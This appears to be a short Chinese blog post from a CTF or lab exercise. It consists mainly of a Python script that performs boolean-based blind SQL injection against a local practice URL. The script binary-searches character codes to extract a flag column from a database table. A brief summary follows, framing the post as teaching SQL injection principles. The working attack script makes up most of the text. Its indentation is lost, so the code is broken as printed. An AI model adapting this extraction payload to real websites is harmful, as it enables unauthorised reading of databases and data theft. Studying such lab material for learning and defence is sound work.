import requests
import string
url = 'http://127.0.0.1:18888/sql/p7/index.php?id=2' #url
flag = ''
print(len(string.printable))
for i in range(1,30):
l,r = 32, 127
while l < r:
m = (l+r) // 2
payload = '-if(ascii(substr((select group_concat(i_am_f1ag_column) from f1ag_table), %d, 1))>%d, 1, 0)' % (i, m)
res = requests.get('%s%s' % (url, payload))
if "id = 1" in res.text: # 判断回显信息
# flag += chr(m)
l = m+1
else:
r = m
flag += chr(l)
print(flag)
print(flag)
攻防_漏洞_SQL注入_bool盲注
于 2021-12-01 14:17:21 首次发布
该博客探讨了一种常见的网络安全问题——SQL注入。通过Python的requests库,作者展示了如何利用ASCII码进行字符遍历,尝试获取数据库中的敏感信息。博客中详细解释了利用`group_concat`和`substr`函数从`f1ag_table`中提取`i_am_f1ag_column`列的值的过程,并通过回显信息判断字符。此内容对于理解SQL注入攻击的原理和防御措施具有重要价值。
993

被折叠的 条评论
为什么被折叠?



